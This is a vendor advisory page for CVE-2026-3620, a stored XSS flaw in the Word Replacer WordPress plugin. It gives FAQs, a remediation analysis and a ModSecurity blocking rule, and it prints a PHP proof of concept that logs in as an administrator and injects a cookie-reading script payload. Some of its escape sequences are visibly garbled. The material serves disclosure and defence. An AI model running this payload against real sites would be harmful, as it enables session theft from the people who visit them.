What is CVE-2026-3620?

CVE-2026-3620 is a Stored Cross-Site Scripting (XSS) vulnerability found in the Word Replacer plugin for WordPress, affecting versions up to and including 0.4. It allows authenticated users with Administrator-level access to inject arbitrary scripts via the ‘replacement’ parameter, which can execute when other users view affected pages.

Who is affected by this vulnerability?

The vulnerability affects WordPress installations using the Word Replacer plugin version 0.4 or earlier. Specifically, it poses a risk to users with Administrator access who can exploit the vulnerability and to any users who view the pages where the injected scripts are executed.

How can I check if my site is vulnerable?

To check for vulnerability, verify if the Word Replacer plugin is installed and confirm its version. If the version is 0.4 or earlier, your site is potentially vulnerable to CVE-2026-3620, especially if there are users with Administrator access.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Word Replacer plugin to the latest version that addresses the issue. Additionally, ensure that the plugin implements proper input sanitization and output escaping for the ‘replacement’ parameter, using functions like sanitize_text_field() and esc_html().

What does a CVSS score of 4.4 mean?

A CVSS score of 4.4 indicates a medium severity vulnerability. This suggests that while the vulnerability requires high privileges to exploit, it can still pose significant risks to confidentiality and integrity, especially for users who interact with affected pages.

What is Stored Cross-Site Scripting?

Stored Cross-Site Scripting (XSS) occurs when an attacker injects malicious scripts into content that is stored on the server and later served to users. In this case, the injected script can execute in the browsers of users who access the affected pages, potentially leading to data theft or session hijacking.

How does the proof of concept demonstrate the vulnerability?

The proof of concept outlines a method for an authenticated Administrator to log in and submit a malicious payload through the ‘replacement’ parameter. This demonstrates how an attacker can exploit the vulnerability to inject scripts that execute when other users view the affected content.

What are the potential impacts of this vulnerability?

Successful exploitation of CVE-2026-3620 can lead to various impacts, including session hijacking, defacement of pages, redirection to malicious sites, or theft of sensitive information. As the attacker requires Administrator access, the risk primarily affects other users who view the compromised content.

What should I do if I cannot update the plugin?

If updating the plugin is not immediately possible, consider disabling the Word Replacer plugin until a patch is available. Additionally, review user permissions and limit Administrator access to trusted users to minimize the risk of exploitation.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, regularly update all plugins and themes, conduct security audits, and implement security best practices such as input validation and output escaping in custom code. Additionally, using security plugins can help monitor for vulnerabilities.

Is there a specific version of the plugin that is safe?

To ensure safety, update to the latest version of the Word Replacer plugin that has addressed the CVE-2026-3620 vulnerability. Always check the plugin’s changelog or security advisories for information on fixes related to known vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 2, 2026

CVE-2026-3620: Word Replacer <= 0.4 Authenticated (Administrator+) Stored Cross-Site Scripting via 'Replacement' Parameter PoC, Patch Analysis & Rule

CVE ID CVE-2026-3620

Plugin word-replacer

Severity Medium (CVSS 4.4)

CWE 20

Vulnerable Version 0.4

Patched Version —

Disclosed May 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3620 (metadata-based): This vulnerability is a Stored Cross-Site Scripting (XSS) flaw in the WordPress plugin Word Replacer, version 0.4 and earlier. An attacker with Administrator-level access can inject arbitrary web scripts through the ‘replacement’ parameter. The vulnerability has a CVSS score of 4.4, indicating a medium severity, and requires high privileges, high attack complexity, and affects confidentiality and integrity partially.

Root Cause: Based on the CWE classification (20 Improper Input Validation) and the CVE description, the root cause is insufficient input sanitization and output escaping on the ‘replacement’ parameter. The plugin likely stores user input from an admin settings page or custom post type without proper validation or escaping, allowing the injection of HTML and JavaScript. As no source code is available, this is an inference; however, the CWE and description strongly indicate that the plugin fails to apply WordPress sanitization functions like sanitize_text_field() and output escaping like esc_html() or wp_kses() when processing the replacement parameter.

Exploitation: An authenticated Administrator accesses the WordPress admin dashboard and navigates to the Word Replacer settings page, likely located at /wp-admin/options-general.php?page=word-replacer or similar. The attacker submits a payload in the ‘replacement’ parameter, for example: ‘>alert(1) or a more sophisticated payload for cookie theft. The plugin stores this input without sanitization. When any user (including lower-privileged users or visitors) views a page where the replacement is applied (likely during content rendering), the injected script executes in their browser. The attack vector is HTTP POST to the plugin’s settings endpoint.

Remediation: The plugin must implement proper input sanitization and output escaping. For the ‘replacement’ parameter, apply sanitize_text_field() or wp_kses() to strip out HTML tags when storing, and use esc_html() when rendering the value. Alternatively, if the parameter is intended to allow safe HTML, use wp_kses() with an allowed HTML whitelist. The plugin should also validate that the parameter does not contain event handlers or JavaScript URIs.

Impact: Successful exploitation allows an attacker to inject arbitrary JavaScript into admin pages or frontend content. This can lead to session hijacking, defacement, redirection to malicious sites, or theft of sensitive data. As the attacker requires Administrator-level access, the impact is primarily on other administrators or users who view the affected pages, and it can be used for privilege escalation or persistent backdoor access.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3620 (metadata-based)
# Block stored XSS attempts via the 'replacement' parameter in Word Replacer plugin settings
# Attack vector: admin-post.php?action=word_replacer_save_settings with malicious replacement parameter
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php" 
    "id:20263620,phase:2,deny,status:403,chain,msg:'CVE-2026-3620 - Word Replacer XSS via replacement parameter',severity:'CRITICAL',tag:'CVE-2026-3620'"
    SecRule ARGS_POST:action "@streq word_replacer_save_settings" "chain"
        SecRule ARGS_POST:replacement "@rx <script|<[^>]*onw+s*=" "t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3620 - Word Replacer <= 0.4 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'Replacement' Parameter

// Configuration
$target_url = "http://example.com"; // CHANGE THIS to the vulnerable WordPress site
$admin_username = "admin";           // CHANGE THIS
$admin_password = "password";        // CHANGE THIS

// Step 1: Login as Administrator
$login_url = $target_url . "/wp-login.php";
$login_data = array(
    "log" => $admin_username,
    "pwd" => $admin_password,
    "wp-submit" => "Log In",
    "redirect_to" => $target_url . "/wp-admin/",
    "testcookie" => "1"
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
if (curl_error($ch)) {
    die("Login failed: " . curl_error($ch) . "n");
}
curl_close($ch);

echo "[+] Logged in as admin successfully.n";

// Step 2: Get the nonce and settings page URL (assume admin.php?page=word-replacer)
// This step may require fetching the settings page to extract a nonce for the POST request.
$settings_page_url = $target_url . "/wp-admin/admin.php?page=word-replacer";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $settings_page_url);
curl_setopt($ch, CURLOPT_COOKIEFILE, "/tmp/cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

// Extract nonce (common pattern: name="_wpnonce" value="...")
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
if (!isset($matches[1])) {
    die("[-] Could not find nonce. Expected pattern not found.n");
}
$nonce = $matches[1];
echo "[+] Found nonce: $noncen";

// Step 3: Inject XSS payload via the 'replacement' parameter
$payload = '"><script>alert(document.cookie)</script>';
$settings_url = $target_url . "/wp-admin/admin-post.php";
$post_data = array(
    "action" => "word_replacer_save_settings", // Assumed action hook
    "_wpnonce" => $nonce,
    "replacement" => $payload,
    // Include other expected parameters (e.g., "search", "case_sensitive") as dummy values
    "search" => "test",
    "case_sensitive" => "0"
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, "/tmp/cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 || $http_code == 302) {
    echo "[+] Payload sent successfully. Check the plugin's settings page or any page where replacements are rendered.n";
    echo "[+] Payload: $payloadn";
} else {
    echo "[-] Failed to send payload. HTTP code: $http_coden";
}

// Clean up
unlink("/tmp/cookies.txt");
?>

Frequently Asked Questions

What is CVE-2026-3620?
Understanding the vulnerability
CVE-2026-3620 is a Stored Cross-Site Scripting (XSS) vulnerability found in the Word Replacer plugin for WordPress, affecting versions up to and including 0.4. It allows authenticated users with Administrator-level access to inject arbitrary scripts via the ‘replacement’ parameter, which can execute when other users view affected pages.
Who is affected by this vulnerability?
Identifying impacted users
The vulnerability affects WordPress installations using the Word Replacer plugin version 0.4 or earlier. Specifically, it poses a risk to users with Administrator access who can exploit the vulnerability and to any users who view the pages where the injected scripts are executed.
How can I check if my site is vulnerable?
Assessing your WordPress installation
To check for vulnerability, verify if the Word Replacer plugin is installed and confirm its version. If the version is 0.4 or earlier, your site is potentially vulnerable to CVE-2026-3620, especially if there are users with Administrator access.
How can I fix this vulnerability?
Remediation steps
To mitigate this vulnerability, update the Word Replacer plugin to the latest version that addresses the issue. Additionally, ensure that the plugin implements proper input sanitization and output escaping for the ‘replacement’ parameter, using functions like sanitize_text_field() and esc_html().
What does a CVSS score of 4.4 mean?
Interpreting the severity rating
A CVSS score of 4.4 indicates a medium severity vulnerability. This suggests that while the vulnerability requires high privileges to exploit, it can still pose significant risks to confidentiality and integrity, especially for users who interact with affected pages.
What is Stored Cross-Site Scripting?
Explaining the attack vector
Stored Cross-Site Scripting (XSS) occurs when an attacker injects malicious scripts into content that is stored on the server and later served to users. In this case, the injected script can execute in the browsers of users who access the affected pages, potentially leading to data theft or session hijacking.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploitation method
The proof of concept outlines a method for an authenticated Administrator to log in and submit a malicious payload through the ‘replacement’ parameter. This demonstrates how an attacker can exploit the vulnerability to inject scripts that execute when other users view the affected content.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation of CVE-2026-3620 can lead to various impacts, including session hijacking, defacement of pages, redirection to malicious sites, or theft of sensitive information. As the attacker requires Administrator access, the risk primarily affects other users who view the compromised content.
What should I do if I cannot update the plugin?
Alternative mitigation strategies
If updating the plugin is not immediately possible, consider disabling the Word Replacer plugin until a patch is available. Additionally, review user permissions and limit Administrator access to trusted users to minimize the risk of exploitation.
How can I prevent similar vulnerabilities in the future?
Best practices for WordPress security
To prevent similar vulnerabilities, regularly update all plugins and themes, conduct security audits, and implement security best practices such as input validation and output escaping in custom code. Additionally, using security plugins can help monitor for vulnerabilities.
Is there a specific version of the plugin that is safe?
Identifying secure versions
To ensure safety, update to the latest version of the Word Replacer plugin that has addressed the CVE-2026-3620 vulnerability. Always check the plugin’s changelog or security advisories for information on fixes related to known vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations